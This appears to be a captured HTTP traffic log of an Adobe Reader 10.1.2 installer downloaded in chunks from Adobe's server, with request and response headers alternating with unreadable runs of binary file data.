Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=27262976-28311551

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:56 GMT

Content-Range: bytes 27262976-28311551/53784984

Content-Length: 1048576

Connection: keep-alive
..zj.N"lpKKO}.~D....6..Cv..q...K.j.#a.DT.a9..f..q...*5.......}1.uK....
.$..\=...f..^K.^[email protected]....
!nmd.\....J.[.....AT.-.n.{..%..k....TE~..x> . _`...z.57....k..wH...
....~.%a.._MW..uD..P..!S..X..7..T......6..;.([.b..E..zB...r.h=.`....L.
..F..=.(F..0'.T ..7.94P.z!!U..T.. ....F..|....1..U..^....._zg...v.D...
......7...ZN.Tb......1R..1......o.N*$D..J.6...V..3......\.N....._T.s..
.P.;.....?.8.s|.....!..7J........".....V.V..r.t.z.|4....Z6.i.........[
.......#..=...6...W.}...6!(.|....I.h.q_.h.........S!..].;].x31.x.m....
7....>..(...,.....F.. ...O...7.T.i......t...._HYsa........9..m.....
HFb."Y.Q.... y.t..#..Z..|.$....O.P....NiG....'.........{h:{.v....F$.Y.
[email protected]_.g.8.<3J..b..V...V.6h(*4B.....js.z.GX ..$....,.
....)......=....2..0..Or._.'..A...3e=X>c!.....]...Qa....{...*V.{...
.\....H.0.P8@\0......d......d6[..9.q.52.5...ö\wI.D.,i_n..`....T(....
MfVCU.F.....J.I.j.Hk.=.C.d).. *.;M\..v.g B..H.....DB.'.C..{$..4.c.$..$
B.{i.............B....=.. NT\...6.t...{....ImF..B(Gg.......$E.5.o..gi.
.?U.l..y.....Yz.o*.7..z0i..qW...C...;..}..w./..6&f...yW..O.H(\...}..K.
..]..o..v/V|. ..\2...3}$~).V...Q..$JJ..@........ .....Gj.S^~..M..v...m
........=...A.>.OMM...j.....O.@........}.....Oz2........mL..j......
...... ..1$...g.u..j.B-*>..z#b.=.......^z@$..... @...K.....|..-%.[.
y8eZ...QIb.W....M..n^.......@/.'........-l..&(.i..@%q..2..........U$l.
._..ha....PyiQ.....y....Ec........U.[`....h...H.)...{ .3..Z(.spQ.KL.&g
t;.....}.}.FSS..Xes......1o.x.~b{q.............}.9ego*V...;;.`.G..
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=28311552-29360127

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:56 GMT

Content-Range: bytes 28311552-29360127/53784984

Content-Length: 1048576

Connection: keep-alive
.*........dE',._V&..O7.y......#YB..:.....gO.%|...........)-M..AQvU1-.f
.ma".|e...,...B.4.c...{...f.....7.V`MB..Z..<..c..C.f..W..........~T
.j)pb;...W....."w..:i..........G.[|.......K..qO.|`.N..;...H .$.{.'....
.K2...&..8..XF>e..dW.....x.....&.}......B..Q....T..r)Y0..jW..F.p...
.gp..D..z.q....e...*...I..8.p.....t.....g.k.?./p.Ew....|..U..Z...KD...
.....m....8......8.0.i.^Z.A.8...8..n.#?.o...aIQ.H......A.v...V..6@....
..2~>....#....O<Zl._.!B.......`.yT ...#p.O}[email protected]..%
Lq.Y"X.*.][email protected];
[email protected]......~zt.....G....0..p..E.Q....=j..6;m.s......V
.*.....I...l*7w$oH)u...H........c..N...........8.....PO>?A.k....cX.
...IEf.....p....h5df..w..nX....Xg!/p7T.g2.[.;..`[email protected]%
..!..)G.Y.u .~....W".0M...0O..*..0....cv..,=4D...(&..iNHa../W.*.......
.;F2>..F.B.v[.>.NV.0..:#.[`vD...XB..2..W...y..H.?....7...X.z....
..2i......=.I.8..E..........4..-.......S..{...[.a.........j....W.E.O..
c..1...K,7..Y...3.].x.....|s.A6......<zw<....G........i..KI`...'
PW~F2.m.o]..........=.RW..tw.F...7...o.C...%$o.'.w..$...&..-.'...:....
....&....V.....bM..#9.;.,8..'.t7c..HK..*G...:.P. D.pB2q..x...3...O.t.;
.{......Kii..<Tz...a.wr<Vg..}.k.PV..)... :....\.[....(.s.Vx.z...
.J.c..c.b..B..0.h..6H.R.|@.]#..g.[......../d.I,f...?.ff.r=..m...I...&l
t;.........M..e$..e..&P.nK...q,..s.H.Q.t..~Lx.t...........}.'#.73..t.)
.k.w.}...>.=.......... y...: 1Y..C...`..........d......>y./....!
.....0.rE.....gu...wx(Z&..E.........?...P.H.O,.r...g..x.Bcg.<a.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=29360128-30408703

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:56 GMT

Content-Range: bytes 29360128-30408703/53784984

Content-Length: 1048576

Connection: keep-alive
Oz.g^:N....;=.U...:R...No.n..rl.~........}$J:....e.F.....=...&p... .~.
..m..C...x.x....C.y.~.~l. .........!,@.>...v......*:...Na(j~../...a
...~6F.]....N1..e.DbQ.....z!....u..nU....6.pv.#[email protected] I.S...
...7..5S..[%...J..9S..q....s......6.[...l.. ....o...=.s...5.5....L~.g.
\..{...`......'.Z.C%........^....e......}Z.W..2O...3..V_..;.?7.:......
g...[fL....n..7u.UPZ.......<..<U... ...T.jqz.h2$..<........*.
..|65...w.C.^..O<..D5..Q.f.lk.....'...y.....p?.3....{..r.9..V. ..Y.
..S..|(5....>........)..a.....=X..#z.....rp*.d^RJ...0_..`......W..$
\...M.6~.T.....!=*.r.t...5?._.0O....0r.@.$.........>>......W0.]'
.D'...^..7.....N.l.l.5.iY..G.l.#.W#..].l...w5..;3f.n..\1..$....q..T.%.
....]C3..C@..;e.R.....]C.z.......)I........C.=.[K........y/b..).N.;{s.
......D.....X...|......9q.X...H....6%|.a?..n...'e..#...."..|M6..r.....
..0A...c......SK.Je.IW...\....-.U13#.iP..\......8.L.,..:....'.~..h.NdW
....W..{V..].r..E...e....>.U....m..w.F.w... .vAB..........L........
B..##..=.......J.&|..V?..... ........ .w..~..E....-.....,=C.Z...A....W
(.f.?pUS:....Rev...Z...Y.....c.;.Mg,.h...........Q.U...mIez...!..&.cs.
..HK.....{b.e..}...........W=b.B..<7.aIK..P..[...b.v../...`S...@...
.3.t...u\c$.^.......s.:!.. [email protected] -.g&
lt;Y.d.4.N-..Y.y.A..H...w./.....~.....U.6./.....&..........r.x[\.u!.W.
O..I..Q.>[.2..2T...n.x...t.........U.*.Wx/J.J.........J.j|.....H...
.....6.>..L....:e!f............h.;yz.,)[..*...w....;.....U.M.M.....
....K3d.ey.(M.....':.n...Bs.Z.R.....y......22fp........4A(^....O..
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=30408704-31457279

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:56 GMT

Content-Range: bytes 30408704-31457279/53784984

Content-Length: 1048576

Connection: keep-alive
...:p.x.N....O..P...>.qTJ.D.. [RSd'w .....=GZ...Am.Y.0nv.|"...e.F.*
l......\b.Y.&..A.@3.... ...x.F....xv....A.G....'oI..dN..3V`..5Sq.N..X.
a..........V4y.rR~.-I.g...zG.][email protected]#T.^...T~....?....#...ax.|..b
.....\-.....A..R................9~..e.jhr........./.5.N..h>.2X....p
.....pfb.....s.u../..<......X..}s.\tvU.,uS.x.$`.nW..'.JP....!...<
;..9G..~~Pp.<.........4.{..J>)....Y..o.AuN..#...}.e...RnN tg\o..
18.w...H....F . .wr.d......x.m.TD....4. I.X>R..........U.......N.t.
STPF......&....*q.-6%.R....-...X.U.D.....!7C>...;...1..Y.....L9.M..
..c...~..."....M...zl..`R...9.....=...HP.2._o..wIw..M$.}..6........]..
......s|K.#F...........{X..N_..\i>.-...2.B.g..[R:g.....oX..W..t..0.
......}./$).B...P.d...L..s....3.#...:.<.k.8M..){.....:k./.'~!...'.S
W.'..,.iJ.f.....{.yHn=.n.7r.....P *z'..4s.,..-S. ......9......N..m4..l
Y`...KG...A0J,RDlk...{?u3.Vq.ck....Y".zL.)G.3..nQR..@4.../.$q...D.....
.3..!1[."..;..o.8....@.{.,......C.S.x. ..i...q...B............V.3....3
.. ...5S.B>.mVE...Z.......4.N...$..M..R..m3.W.!..<`.B......dl...
M.h.$....u.....C?{q.\..KWo....R....T..t....uu...u..!!Q....?..(N.pJ....
F....1.......34..;!p.f..y..... o...T.2 ....u...... ]f.O9.}..i....*...f
...5..v..E,..<r..t].HzL....K<j8......|.E.M..:O..-..sV..]........
.<j..b.._...6...y..{W.HT7.Mr..t.k..t%}.G.....xC`...P..]..p^.*..DlO.
@o,vP..=.<....cQ..$...6......_.Z.....]....q...j(..:. f<~B.d....m
.*Wn.z0..F...?d{.m:.6.&.c.....$..lY.j.7...O.5m.B.6Z.3...F..=.\.C;.rF..
..l.....\[email protected]|.................\..;XP..R....;.W.v(.wS&j9/8T.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=31457280-32505855

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:56 GMT

Content-Range: bytes 31457280-32505855/53784984

Content-Length: 1048576

Connection: keep-alive
9....b..9..U4VA...bY..,.....x_.......8........=.......pf.."...n.w..G..
.....7N.\"..R. .7(.{./ Lv..2..y.N...(..9.....c.9......8...n.~.S..".:I.
.p......c...O_...|[email protected]..&b.>..ZO.[......MT.qa.5...P.0.^
0..v......7ii..nz............1M..f..\....P}E.f.8.mi... It.:.....h6....
6x.y..N....a-..M....S..#...K7.^........U.`%o...!...v..c..x/F.h.n.....:
z.i.3..?...`..#;<..v.N....2.....?.'..B ..[..5..{..T...!...UkC..p.`.
@..l..........V.#`tJ...Wk...b....yJ...rHC ...w..).e......`..xk/.z...dG
.D.yd.(.[..y\>...iUX.1.....N.F..*[email protected].",..;..$...CR... >Y
...lE......d...C.Q5..j......Z=d#.u.6...........,......L...J".i........
....2l.G7W.J..ao..*.t.!.'..{[email protected]].%..t..
c..:.a..d..,`l..|..{E.J...P.m?.....z.s1`[email protected]["..
.......c.YF..%...8...LP_.'/z..{q..}.=fC}ji.....Q(B...p*..['P..L....J./
.t.9...T.78.5.....0...g..6...h.B.....7`.t... V........d.|.............
...?. Ys.k.....#...qB.<.k...B...#M.1&j...)v..$...l,.^....Qc........
qj.r.............qTw.....2........s......k.,.....,.h.!u....(...W../hV.
.>..{.h....j......]..]|.k..NP.Q.......@[email protected].}.q....3ca.!.r.J
..W.y ...\EJE.1h6.$...v..a....&.C....6...T..K...^.4.....g..=:..|Tm.]..
....|%a.8.&....m...G.m/.d....M.<...R.........?..8.w........iQ:tx|..
(...\D-."...(.....g0#.$...r@^.`.:.......H.@....^.....w..}...d.P.3.nF..
..n;V^..lU!kH....D..UQ*...b....f^..&ff..QE.'..vd.....5%.m.m.^.trPC5qzT
...........5~...$k..w.J.....#.........F.n.......2.R.L&.jQK.ng{.:..6...
..V....\..q\......4.....:...X..D.}.A"s.......D..p.h...!>.%....o
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=32505856-33554431

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:56 GMT

Content-Range: bytes 32505856-33554431/53784984

Content-Length: 1048576

Connection: keep-alive
.g.f.....&b.x]t...L..F.Be....Z......FkS.B...a.....,$...x......aw..U.W.
..i~h....E....s....._...0..;x.-h$....s..OF....C....$.......1%...A..Pq.
......)T'..#.k.>...H..C.r...#...{.F.A.*.....;30& ...6........F-..9.
r.]....Z.S.qG..jOW....M,....V..!.. ....<.D..j..2Kt..V..0......Z.`U.
..m~Q....;._...^6'.g."..2=.h.3..)."..{..}..=.....F...=N...asF\#V....[.
YH.....yR.F.Z...KV..q.f...!....!....a......|...........4.b.%.....,P!.=
..b..LW.]...I?....=....r.)-..SOg....6.KTX...|E...Wr..g....Q"...m.....U
A..:.10.#p....-..L..F.h<d.....y....g.~O...hb...d.....>...2...R.X
.4......E".jc...k..~..... .&...U.d1.7|.....'......"`..x-.9mW..o.;.pj.t
.!.c.\.S.c.#...-....^...!..]_. 1#.'.y.A.|.%.[....|.J.c..Q..&....\~s6..
.z;.(.^;..$......BT...bh.:..x........Liw." $E.6..'? .n*...}.'..._#Z...
.hQ....cW.z...C]...@H...{5k.).c.P.A...*g........].I..ZB'..,....\..#^v.
.1.5J..8{.....#M.=..>....0.=,8..yV@:'SF.L...?t....L.........M.Ue..I
..!..c.}....i..1..;.g.r<1...........V5..U.?)@...31Q.Y....c..G..s...
dV!$.j......t..........U.y....Q......\.`.b..d.C~...PoaSs.|.....H `..q.
i.B...6...Z..V.{..r........<..F.....jH..."..G.........z1.v.....~~..
e. ...r~.y...3..?..;P>. ..l.Rtg....E.[.... -]#{.x..5..&...If..h..P.
....(....B...[..g.&-gE....x.4U... U).lT....G..,.{o....g.l0..lc...q.c%.
t)[.9D..4j.....G.....A0._?.E.M.*....lS.... LJf..e........"..0PzY.s.~..
.zQ5..R.#..:fN..[W..V:..W05..q.....|..l.?.M...0.=.I{Eo...)..6.>....
...$&H*fT.-DJ.R...I.3.q0...GZa...j#..W2...4.wYk..te..6#....2.y...J_.64
...i......Q.....i....4.Y[....q7..R.5.;..G1.....~..w..B......C.....
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=33554432-34603007

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:57 GMT

Content-Range: bytes 33554432-34603007/53784984

Content-Length: 1048576

Connection: keep-alive
.T..W..1.<.........D)...}>........X.....vW.C.V.P4g..cR...Jw...`.
$.X.oK..U...M.w5.t...5RK#e....&,u....wS.......w.B........d}e.H..U].s~.
.{d......T.z....8c....B..Z.kN#..o.. ......,......,s....CY.....J..E&.qy
........-.\.hc....oc.*.........G.c_.&.b!P.2..6G2.$..F[1.$Y..2L9..?.. .
..x..B.8..M..N.......B..6..M..$c.K..P ....iE.:...'9EN.....W. '..gj..).
.....6.6........*.B..k.....t*.......z...k.d.' y0.@.~u..yk6.<...`. #
..*M..a..qr...k.C.r.jI.....#.f..I..t..N^. .....0..oa......n.U.......b.
.XY..C.3.x$...`b.]M...dc .b[..X..'.,E.C....I\Y:.t.><..wyG.9.....
...l8..........._...5.hhR.K....J..q.....`..8Ml)]MY.u...Z7.#!..........
n..F...E.4/..H.#...#..0.a{.../E.icg.....)hiq/.[/.PW.F,.......O..as....
D/.^_....0c.\R.T q._0kr<q<A_... 0.P.u.e-."@.%i...p)B........]...
...}....K%....p...;.?..mHX....B.E|..y.../yW;.....8I.....z....p.@......
...(.7.'S.I... .7./.0....<..(...TK.6.h.A..$..?.Y.....s...%.%.~.E.Il
.[}.....y.O.03...W.......-.(r.=.G......S..Z.h..<.....o.....m.2.I.TX
.E..%..X..g.y.w......j... ..h#..lI.)6.Z.h.S.....0....sU.l...ME(...=/].
."...7.........U:....u...!.....Y........d.N...dP..D.mLP..\.o*.....}.Xb
..BV...F...bE..*..i.L^.0._Dn:......oY.%_!b..x....4!.Vl3.....^h.O..m.h"
...{.~m.....F.q...*.zL..1.B..5....]._v,y.B<;.\...'...e.FE...p..A.Fo
..Q.Dy.......e".;'./T....IA`.._&.b..v*G."_..rK..*q E.n<W.....0&.Dn.
.....E...n@..<...r...0q....=.......y]....\F..:..e.0..g...&.0......P
).....tXY.DHf..~...W.....\.s.M.....[c.VI/....phUF....X...B..........vq
.IL.,T>A...$w[.Bk.....<#...`.6..\.....=..(.jW...*.._c.S.....
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=34603008-35651583

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:57 GMT

Content-Range: bytes 34603008-35651583/53784984

Content-Length: 1048576

Connection: keep-alive
....T......<;...D...o.].y../.S...D.e.mw?..r..AI.9.3po.|T.n..;k...K|
..#..../.`.<...(..........K{[email protected]...(@.3
F..].4g..D..B.....e../6..e..Z.rN.......9...<.B.....(d...]$.:. H]...
.......*3...F..'..S.?.r......Us..iR..a5...>E.....7.&~.L8.k.g>.~.
...1.(....|.3"..G.y.E......nh.z...:..0..W!...3... .&....h.....7....S.I
.y&B/{X... <..y.j"Q..{...b1qSU....a.>P.(.=9l$,..v.......S.G./..X
.C.'3Lox..' .=..0..N;..l...K...E.Aq.d3}D../t..>...cY2Q7.K....a.k...
.Rb-..S. ..G...a..N....-=.%d...y..:...~[.7m7.Jn&..... uU.pZ*R.#..U".R,
.i.O ....."$T..F/.D.tF.<......;.Z......C...K..-.yJO....a1...7......
C.J.9g..G ..qT.4.E....g.3<.$.7..lt.f.0.K|.t... ^.I....5|..`&.......
x.M<.Z,K...h./.|.[4.o.k.....^.8..^^.............V_.. J..0.mG.EkM,${
..*..].D.O.Y..Y.u%|.h2..(`..G... .....P.]K...P...U.2O....^.cuY..f.Q...
.&.i..Bs.c.."|......6...;}...=...x.....X]..(.....L...Iy\.a..=7..r...k.
t[9.`.?7.4[...=..\..,.~L...!.>.2.*.1.E.....T..KnA...rC.Xf...a2..1S.
...y.El.....DVRl.R:.m`QjF:.1%..}Au. 4........0p.....e(..y...[.....7j..
.........7...2..I..R..<P..L..vH..F1.[..C...8w.e..3a.U?.D.....k]...S
pF.f.....x......I=.Naq......2./K...}.U....n].......L.M.#.o.V^G....Usf.
d\..!_.......N..b..U....m....}..eE..eq.%;..._.......4.V/.~.#...:.C."..
.j.........u..D.Vw...X...I...u. ...9...$=....-q...'^....I...$g...{e..j
.>.....f.d.|.........*.....|.H\.V....3._l-c...(Q.......bW.....&.:..
T......<....LH-.#9..\<...._k.c..|..._.&.......U.U<4.......{..
.....).._.....@]..M.....)".r..2.-$.X1....."..R0...qh....A..~.....~
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=35651584-36700159

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:57 GMT

Content-Range: bytes 35651584-36700159/53784984

Content-Length: 1048576

Connection: keep-alive
..-.n)...-...-$.jS.../.....E..-...b....f"zGH..Pz..X.}.N`.$iH.<...M~
.}..`.#.M..u.....{..d(5RZ;.~...$.........I.kH._.l.9..W.L.L9.2`M..Q...|
[email protected]%I..../.,.. .....8..v!.%...E.h;f.Mr.L;/.Zw.&.o
..V..P...7.=.....N..Bv..|.Q#W.~....:.?..^w.....a....k..;..~..U.....P.?
q*6\......*....Q.V.v.=.u.-`....]..W.F....<.bw ..Fp..oW%%......M7...
.....L...UM.5|[[email protected]<..&...3.;.pV........f.....3E.......V.
.X.........r.o..#/..v..H.. M..EBa.......g.oo.g.f...v.`.-....'SO.a .V..
..d.Q..5.G/.(..m.k..Dq..%........l....).Y.....:.`h.-..<!..,...R....
..*.....P.W.VT.... .....O..E.......JJ......U!.] .K.....<.n..N.n...;
[..y}[email protected].=v*2U..#..h9Ib6.....jL.JO...^..o...-83...
.9.W.........\..T'.L)..\};n.l.....R....E..G..PuFb. [email protected]....(..{d
...b.V;..C....*..'p.}.8...=F.:....y-...~LN.......z....)....c..U...h.N.
........y..q..cl........n....T{{[email protected].%o..@....=.3....'...,...q..F..)
.|.......q!..............c'...)wU...r.t...0....y.t.3v.h.. .P.wb)K...&l
t;..*Mx....".#...G.....;....=.x.3.-l....#r.._I.wb......f.....vs.x.....
_vi;e.Q.6....).J6....:Q.d.&.vu...........3.c.P....3.v../.X..*...X~..V.
.#....q[..N....].F......i..n..P@=..0......;."o.7Ou_.....f..P........c.
6..`.}.q.f....?Is......:...7.......3...y.....<{..7#\3-...[..a.....s
..N......v.E.j.p.O.....;H.........h...'O...h.\..N..o....s..<..x....
....`.......>.....B...F.v?....V#PLt./...|H..G...:.......\IO..6B....
 [email protected]|...../..s.....2Y...(........_..5..0Y..
.|n..v.z..........%XLv.4.......D..H..rd....0[.......0...v<.....
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=36700160-37748735

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:57 GMT

Content-Range: bytes 36700160-37748735/53784984

Content-Length: 1048576

Connection: keep-alive
.%{.=<._3x..>....vK.s.....Z.!......P...:.....Pq..;....z.Q,..../h
d?.Ba...B...^...I.Ie.....*.0..*.9........h.fjd..!....E..\ps....Y.... ~
.!=)p..T>..r..._...DX...M...~X.&......m...'Y...7.S?..........dl...\
.nH...x.N..E{........B...`......"R..:6D............=H.//?.B._F.#..T4..
eu...O..Bvm[||........H&.jeW.ZIMi ?.)y..*..nP;.sM.p....J..G..m....d..)
n8.9.... .z..@#.J=).W...R..c...-N.....EK....ZXS..7.0D..f.4.K..........
,{a..<s........_..[...j..2'.$......c....Y{.,'.....6....J%.<.v...
p....W.............4.!..&3.......o....E#..6&M...~...Y.m.u .C..~...futL
F...)Ds..A..g-.BJ.......W..yE.?M....z..b$.....Ft.....EY.H<........"
].t..".1..|#%..4..L_...@.=Y..p#...5...X...}.v._...........e........].-
s!...Cz4.fB4..h.E.n?M&...y.._..s..c.\...<...I...s.gG&.1n....=.....E
h._.........B.o...91>..;...{.Y].".z..A[..v.C...I....a.....c^.8^....
...k....h.h.E......=.oq.L..$b.u0T.-.D. .W.,.h...W...([email protected]%@.{..
......<.79...U.v.....N.._...A.y....X..../...M.9'/{<..GwY6.S....P
.2.......W...>......iM.........W.r.....m....s0....wN...}N.....X._..
./Nr..-..[. ....._..7..... .|....j.......v.Z...........:..lj..P2...$B.
.....27..7a.]q.'..(...wu.......N!2.4}...j...../B....>}:.9i..d......
..`..6...,..TR:.U.,_...M.{H.c.:.W.gM..-.k....}Z.....c.......%tp2......
.k....c.....<.`.`..x....d.....u...u....$..../C.j....^......3..(..}3
.B........g.6.{....&_.N.k.W.[[email protected].`...y..E5..........-...'?.P
R...w...~....r...`.!.c.....r..xL...fY.........._/.].)....z....e.}....M
%.......(...3.5.s.e=.x2..N%.\[email protected].{..3...\...).....L...
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=37748736-38797311

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:57 GMT

Content-Range: bytes 37748736-38797311/53784984

Content-Length: 1048576

Connection: keep-alive
.....yU.. ...:..u....Y...M/A..R.p7.x|F.f....7z9.......,..ui.,?...4....
.Y[F~...=$W.....t8.......y...7:...).i...%.....6...-.05.e....a..&b^....
D*]....I...jy...s.h.....%.Y.$._.v....F....2...... ...m.D.z.mX.NO..]../
./.zc..kp.].}@...Z......9..Q..B...y.....(.t?....G.....o........a.[3.%x
cG...5...C .>.p...\<..0.\........t......../......c..0......._.r.
.X.. ...q...$...,?a1..i.CWP......t.x...f...@j..)..k.b..#.WQ.*/.... ...
..97}.=.q.9.C.ooAc.|...?...B{.l..m....'w.P....?..."[...P... ..'.r....t
}[email protected]<(T.d........a....'Jy.zj.h...
.....sy8..$.,[email protected].=4.' (.>] H.:.;.Ug.g.G.....E@....=
k."X.R'.R.r..q....-.~...$...p.......E.......K4...#.8\.\........Q ..rK.
....Z@.........?.#K....$.u..W....N.6.'...=:....\[email protected]&,t..&
gt;lr%.F.K...........aa.I...L.;..15NK.....g.n'.Vs...~WS..wn.....Dq_y..
.E.'..".Y.'l.....{...s((... .4.!E.i=V7................e..T.Q..].V..V..
6......72......`....q....W.......r....{(...}I...E<?..*[email protected].
"B....|Y........#\.pK...V{d).A$..b ./M.?waq..u..$*CuC_Q..p........P,.@
.K....\op...&|......%...;...s.....*.;../[email protected]\......o....#Hib...*A.%.
.<9X{.0.K......f*...|.[...;....7.%,..{.ldyn...%vV.Bg.9.(...9O...Lt.
g..xO.....n.....Q...`|O....FR.>:IX.bV..zkZv'....`D.5.........b.....
._U.MM.x...6..._.k/..D<lC....!.~p..3.z..S.$3.....x..`W...WH.n....[]
"G....U..h..;.....p..?..z.?....5aU.HeJ.c.1T......C....p..z.3A.J.g..j..
......... ..........s$...U\..Sr.}........v(.P.g.a..)v....).g.9..v .hO.
..3]n..(.....'....I.:j&n.I..i...p.ew0._c.x..\..3E..O:.......KV~...
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

